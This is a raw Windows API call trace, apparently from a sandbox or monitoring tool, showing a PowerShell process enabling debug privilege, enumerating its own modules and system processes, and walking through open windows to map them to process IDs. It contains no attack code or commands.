	[0506.025] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdcb8, puLen=0xcdcb0 | out: lplpBuffer=0xcdcb8*=0x2dc733c, puLen=0xcdcb0) returned 1
	[0506.026] CoTaskMemAlloc (cb=0x204) returned 0x3368e0
	[0506.026] VerLanguageNameW (in: wLang=0x0, szLang=0x3368e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0506.028] CoTaskMemFree (pv=0x3368e0) 
	[0506.028] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\", lplpBuffer=0xcdd08, puLen=0xcdd00 | out: lplpBuffer=0xcdd08*=0x2dc72c8, puLen=0xcdd00) returned 1
	[0506.040] GetCurrentProcessId () returned 0xf54
	[0506.047] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xccc30 | out: lpLuid=0xccc30*(LowPart=0x14, HighPart=0)) returned 1
	[0509.111] GetCurrentProcess () returned 0xffffffffffffffff
	[0509.112] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xccc50 | out: TokenHandle=0xccc50*=0x2f4) returned 1
	[0509.113] AdjustTokenPrivileges (in: TokenHandle=0x2f4, DisableAllPrivileges=0, NewState=0x2dcab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0509.114] CloseHandle (hObject=0x2f4) returned 1
	[0509.118] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf54) returned 0x2f4
	[0509.126] EnumProcessModules (in: hProcess=0x2f4, lphModule=0x2dcab80, cb=0x200, lpcbNeeded=0xcdc68 | out: lphModule=0x2dcab80, lpcbNeeded=0xcdc68) returned 1
	[0509.129] GetModuleInformation (in: hProcess=0x2f4, hModule=0x13f370000, lpmodinfo=0x2dcadf0, cb=0x18 | out: lpmodinfo=0x2dcadf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0509.130] CoTaskMemAlloc (cb=0x804) returned 0x338d40
	[0509.130] GetModuleBaseNameW (in: hProcess=0x2f4, hModule=0x13f370000, lpBaseName=0x338d40, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0509.130] CoTaskMemFree (pv=0x338d40) 
	[0509.131] CoTaskMemAlloc (cb=0x804) returned 0x338d40
	[0509.131] GetModuleFileNameExW (in: hProcess=0x2f4, hModule=0x13f370000, lpFilename=0x338d40, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0509.131] CoTaskMemFree (pv=0x338d40) 
	[0509.132] CloseHandle (hObject=0x2f4) returned 1
	[0509.139] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf54) returned 0x2f4
	[0509.140] GetExitCodeProcess (in: hProcess=0x2f4, lpExitCode=0xcdd98 | out: lpExitCode=0xcdd98*=0x103) returned 1
	[0509.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12dcb088, Length=0x20000, ResultLength=0xcdd60 | out: SystemInformation=0x12dcb088, ResultLength=0xcdd60*=0x2f730) returned 0xc0000004
	[0509.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12deb0b8, Length=0x31f30, ResultLength=0xcdd60 | out: SystemInformation=0x12deb0b8, ResultLength=0xcdd60*=0x2f730) returned 0x0
	[0509.966] EnumWindows (lpEnumFunc=0x2b966ac, lParam=0x0) 
	[0511.091] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0512.822] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x558
	[0512.823] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.618] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.618] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.618] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x538
	[0513.618] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.618] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x778
	[0513.618] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x778
	[0513.618] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.618] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.619] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.619] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.619] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.619] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.619] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.619] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.619] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x460
	[0513.619] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.619] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.620] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1858
	[0513.620] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1664
	[0513.620] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x10b4
	[0513.620] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x10ac
	[0513.620] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x10ec
	[0513.620] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1068
	[0513.620] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x17e0
	[0513.620] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x102c
	[0513.621] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x17a4
	[0513.621] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1050
	[0513.621] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1694
	[0513.621] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1770
	[0513.621] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1720
	[0513.621] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x165c
	[0513.621] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1578
	[0513.621] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x16c0
	[0513.621] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x161c
	[0513.622] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1638
	[0513.622] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x15c8
	[0513.622] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1554
	[0513.622] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1674
	[0513.622] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1520
	[0513.622] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x14bc
	[0513.622] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xf8c
	[0513.622] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xe9c
	[0513.623] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1434
	[0513.623] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x14ec
	[0513.623] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xfcc
	[0513.623] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x12ac
	[0513.623] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1484
	[0513.623] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x934
	[0513.623] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xc0c
	[0513.623] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xb08
	[0513.623] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x948
	[0513.624] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1178
	[0513.624] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x13e0
	[0513.624] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xcd0
	[0513.624] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x13fc
	[0513.624] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xdc8
	[0513.624] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xc18
	[0513.624] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xc2c
	[0513.624] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xa1c
	[0513.625] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1244
	[0513.625] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xdb0
	[0513.625] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1398
	[0513.625] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1358
	[0513.625] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1370
	[0513.625] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1340
	[0513.625] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x130c
	[0513.625] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x12c0
	[0513.625] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x12e4
	[0513.626] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1270
	[0513.626] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1298
	[0513.626] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x120c
	[0513.626] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x122c
	[0513.626] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x11c4
	[0513.626] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x11b0
	[0513.626] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1188
	[0513.626] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1148
	[0513.627] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1160
	[0513.627] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x10fc
	[0513.627] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xe34
	[0513.627] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xea4
	[0513.627] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x514
	[0513.627] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xe48
	[0513.627] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xbc8
	[0513.627] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xdf8
	[0513.627] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x318
	[0513.628] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xcac
	[0513.628] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x8bc
	[0513.628] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xf9c
	[0513.628] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xf48
	[0513.628] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xe40
	[0513.628] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xecc
	[0513.628] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xeb8
	[0513.628] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xe80
	[0513.628] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xe98
	[0513.629] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xe60
	[0513.629] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xee4
	[0513.629] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xf00
	[0513.629] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xdf0
	[0513.629] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xe1c
	[0513.629] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xdd0
	[0513.629] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xd94
	[0513.629] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xd74
	[0513.630] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xd00
	[0513.630] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xcd8
	[0513.630] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xc84
	[0513.630] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xca4
	[0513.630] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xc64
	[0513.630] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xc24
	[0513.630] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xb84
	[0513.630] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xbac
	[0513.630] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x384
	[0513.631] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xab8
	[0513.631] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x33c
	[0513.631] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xa44
	[0513.631] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xa64
	[0513.631] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x8a8
	[0513.631] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xaf0
	[0513.631] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x88c
	[0513.631] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xb04
	[0513.632] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x910
	[0513.632] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x230
	[0513.632] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xac0
	[0513.632] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xab4
	[0513.632] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xaac
	[0513.632] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x3d0
	[0513.632] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x978
	[0513.632] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xa7c
	[0513.632] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x59c
	[0513.633] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xa88
	[0513.633] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xa6c
	[0513.633] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xa68
	[0513.633] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x9f8
	[0513.633] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xa04
	[0513.633] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x924
	[0513.633] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x8dc
	[0513.633] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x7dc
	[0513.634] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x768
	[0513.634] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x764
	[0513.634] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x820
	[0513.634] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x810
	[0513.634] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x794
	[0513.634] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x83c
	[0513.634] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x7ac
	[0513.634] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xb44
	[0513.635] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0xb5c
	[0513.635] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x838
	[0513.635] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.635] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.635] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.635] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.635] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.635] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.636] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.636] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x4d0
	[0513.636] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x818
	[0513.636] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x5b8
	[0513.636] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x494
	[0513.636] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x1ec
	[0513.636] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x440
	[0513.636] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x7e8
	[0513.637] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x730
	[0513.637] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x2c8
	[0513.637] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x31c
	[0513.637] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x330
	[0513.637] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x128
	[0513.637] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x5c8
	[0513.637] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x6f8
	[0513.637] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x358
	[0513.638] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcdac0 | out: lpdwProcessId=0xcdac0) returned 0x73c
